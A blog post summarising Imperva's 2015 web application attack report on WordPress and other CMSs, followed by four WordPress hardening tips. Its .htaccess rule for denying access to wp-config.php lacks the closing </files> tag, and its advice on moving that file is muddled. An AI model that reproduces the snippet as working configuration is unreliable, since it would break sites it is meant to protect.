Imperva WAAR Report 2015: WordPress attacks highest of all CMS’s

Security attacks on websites and blogs are higher than ever before. According to Imperva’s new Web Application Attacks Report, Content Management Systems (CMS’s) were attacked three times more often than other Web applications. The data security firm confirmed that WordPress has unfortunately been the victim 3.5 times more than the others.

It comes as no surprise that WordPress is the most attacked CMS. Not only is the most popular service but new data from W3Techs, which measures both usage and market share, reported last week that WordPress accounts for a quarter of the web. They said,“WordPress is used by 58.7% of all the websites whose content management system we know. This is 25.0% of all websites.”

As 2015 draws to a close, WordPress has taken a real beating this year with an increase in brute-force attacks. Hackers and malware are doing a lot of damage by taking advantages of vulnerabilities caused by weaknesses in the 30,000+ plugins on WordPress.

Imperva’s report said,“CMS frameworks are mostly open source, with communities of developers continuously generating sequences of plugins and add-ons, without concerted focus towards security. This developer model constantly increases the vulnerabilities in CMS applications, especially for WordPress which is also PHP based.”

Non-CMS applications were less susceptible to remote command execution (RCE) attacks than CMs’s according to the report’s findings. Furthermore, the report found that WordPress is five times likelier than other CMS’s to be hit by remote file inclusion (RFI) attacks.

Some of the trends discovered in Imperva’s annuals report were continuing from last year’s report, such as increased SQL Injection (SQLi) and Cross-Site-Scripting (XSS) attacks and more attacks on WordPress. A newcomer this year is the mega trend of Shellshock Remote Code Execution (RCE) attacks, scanning web applications on an equal basis.

The report said, “We conclude that the increasing availability of web attack tools and services—with computational power becoming less expensive and ubiquitous—are driving the new wave of volumetric malicious attacks. The evolution of attacks against web applications has continued with increased sophistication, magnitude, and velocity. However, there is hope thanks to the growing effectiveness of reputation-based detection mechanisms, and their ability to identify attacks by tracking previously identified malicious activity to its origins.”


4 Simple Ways to Protect your WordPress Site from Viruses, Malware and Hackers

Almost all of our clients have been targeted by a malicious attack on their WordPress site. When they first come to us, they are in utter panic, stressed and quite confused on what to do. Only after we do our job and restore their site to its former virus-free glory, does color return to their face and they begin to calm down.

It pains us to see our clients go through so much worry, when they could have avoided the disaster by taking only a few preventative steps. You can save yourself from a major fiasco if follow some of the steps we’ve outlined below to help protect your WordPress site from viruses, malware and hacker attacks:

1. Update your site’s theme & plugins

Updates for WordPress and its plugins are frequently released by their official teams. These updates contain fixes for freshly discovered security loopholes to prevent possible attacks. So make sure you regularly update your site.


2. Backup

An extremely important task in managing your site is regularly backing it up, especially before making new changes. You can use a plugin or do it manually. So if your site does unfortunately get compromised, then with the help of your backup files you can switch hosts and be back up and running in no time.


3. Change the login and password from admin

By default the username for WordPress is admin. Create a unique username which isn’t too obvious nor easy to guess; including numbers would be good. The same goes for the password. Set a long password with a mix of upper and lower keys, numbers and symbols.


4. Hide or secure wp-config.php 

The wp-config.php file holds all sensitive data and the configuration of your website, and is quite vulnerable to attacks. You can secure it by adding the following code to the .htacess file in the root directory — changing the coding denies anyone access to the file:

# protect wp-config.php
<files wp-config.php>
Order deny,allow
Deny from all

You can also have it moved to the root directory — your_host/wp-config.php — from its default location at host/wordpress/wp-config.php for added protection.